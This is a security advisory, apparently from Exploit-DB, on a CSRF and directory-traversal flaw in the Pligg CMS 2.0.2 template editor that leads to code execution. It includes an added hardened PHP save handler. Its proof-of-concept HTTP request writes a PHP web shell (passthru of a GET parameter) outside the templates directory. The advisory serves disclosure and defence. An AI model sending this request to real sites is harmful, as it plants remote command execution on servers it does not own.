Pligg CMS 2.0.2 – Cross-Site Request Forgery / Code Execution

  • Author: Curesec Research Team
    Date: 2015-10-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/38579/
  • Security Advisory - Curesec Research Team
    
    1. Introduction
    
    Affected Product: Pligg CMS 2.0.2
    Fixed in: not fixed
    Fixed Version Link: n/a
    Vendor Website: http://pligg.com/
    Vulnerability Type: Code Execution & CSRF
    Remote Exploitable: Yes
    Reported to vendor: 09/01/2015
    Disclosed to public: 10/07/2015
    Release mode: Full Disclosure
    CVE: n/a
    Credits: Tim Coen of Curesec GmbH
    
    2. Vulnerability Description
    
    The file editor lets an administrator edit the .tpl files stored in the
    templates directory.
    
    When saving a file, however, the editor is vulnerable to directory traversal:
    it does not check the submitted filename against a whitelist of allowed
    files, and it does not check the file extension either. Because of this, a
    file with arbitrary content and an arbitrary extension can be written outside
    the templates directory, which makes code execution possible.
    
    Admin credentials are required to access the file editor, but the save request
    has no CSRF protection, so an attacker can gain code execution by getting a
    logged-in admin to visit a website under the attacker's control.
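    The three missing checks described above (filename whitelist, extension check,
    CSRF token) can be added in a single save handler. The following is an added
    example written for this page; it is not Pligg's code and does not reproduce
    the vendor's admin_editor.php. It assumes templates live under an assumed
    TEMPLATE_DIR, that the editor form carries a hidden csrf_token field, and that
    the matching token is kept in the session; the parameter names the_file2 and
    updatedfile are the ones shown in the proof of concept below.

```php
<?php
// Added example (not Pligg's code): hardened save handler for a template editor.
// Assumptions: templates live under TEMPLATE_DIR (assumed path), the editor form
// posts a hidden csrf_token field, and the expected token is stored in the session.

declare(strict_types=1);

const TEMPLATE_DIR = '/var/www/html/pligg-cms-master/templates'; // assumed path

/**
 * Resolve a user-supplied template name to an absolute path, or return null
 * unless it names an existing .tpl file directly inside TEMPLATE_DIR.
 */
function resolve_template_path(string $name, string $baseDir = TEMPLATE_DIR): ?string
{
    // Whitelist check: a plain file name with a .tpl extension only.
    // This rejects slashes, "..", NUL bytes and any other extension outright.
    if (!preg_match('/^[A-Za-z0-9_\-]+\.tpl$/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null; // base directory missing, or the template does not exist
    }
    // Second line of defence: realpath() collapses symlinks and "..", so a
    // resolved path that does not start with the base directory escaped it.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Constant-time comparison of the submitted CSRF token with the session token.
 */
function csrf_token_valid(?string $submitted, ?string $expected): bool
{
    if ($submitted === null || $expected === null || $expected === '') {
        return false;
    }
    return hash_equals($expected, $submitted);
}

/**
 * Handle one save request. Returns [HTTP status, message].
 */
function handle_save(array $post, array $session): array
{
    // CSRF check first: a cross-site request cannot know the session token.
    if (!csrf_token_valid($post['csrf_token'] ?? null, $session['csrf_token'] ?? null)) {
        return [403, 'CSRF token missing or invalid'];
    }
    $path = resolve_template_path((string)($post['the_file2'] ?? ''));
    if ($path === null) {
        return [400, 'File name is not an allowed template'];
    }
    // Write to a temporary file in the same directory, then rename atomically,
    // so a failed write never leaves a half-written template behind.
    $tmp = $path . '.tmp.' . bin2hex(random_bytes(8));
    if (file_put_contents($tmp, (string)($post['updatedfile'] ?? '')) === false) {
        return [500, 'Could not write template'];
    }
    if (!rename($tmp, $path)) {
        @unlink($tmp);
        return [500, 'Could not replace template'];
    }
    return [200, 'Template saved'];
}

// Demonstration with a constructed session and the advisory's traversal filename.
$session = ['csrf_token' => bin2hex(random_bytes(32))];

// 1. Cross-site request: no token, so it is refused before any path handling.
$noToken = ['the_file2' => 'header.tpl', 'updatedfile' => ''];
[$status, $msg] = handle_save($noToken, $session);
echo "$status $msg\n";

// 2. Valid token but a traversal filename: refused by the whitelist.
$traversal = [
    'csrf_token'  => $session['csrf_token'],
    'the_file2'   => '../../../../../../../../../../../var/www/html/pligg-cms-master/404.php',
    'updatedfile' => '',
];
[$status, $msg] = handle_save($traversal, $session);
echo "$status $msg\n";
```

    The regular expression is the primary control; the realpath() comparison is a
    belt-and-braces check that also catches symlinks inside the templates
    directory pointing elsewhere. hash_equals() is used for the token comparison
    so that timing differences do not leak the session token.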
    
    3. Proof of Concept
    
    POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
    
    the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes
    
    4. Solution
    
    This issue was not fixed by the vendor.
    
    5. Report Timeline
    
    09/01/2015 Informed Vendor about Issue (no reply)
    09/22/2015 Reminded Vendor of disclosure date
    09/22/2015 Vendor replied, issue has been sent to staff
    09/29/2015 Reminded Vendor of disclosure date (no reply)
    10/07/2015 Disclosed to public
    
    Blog Reference:
    http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html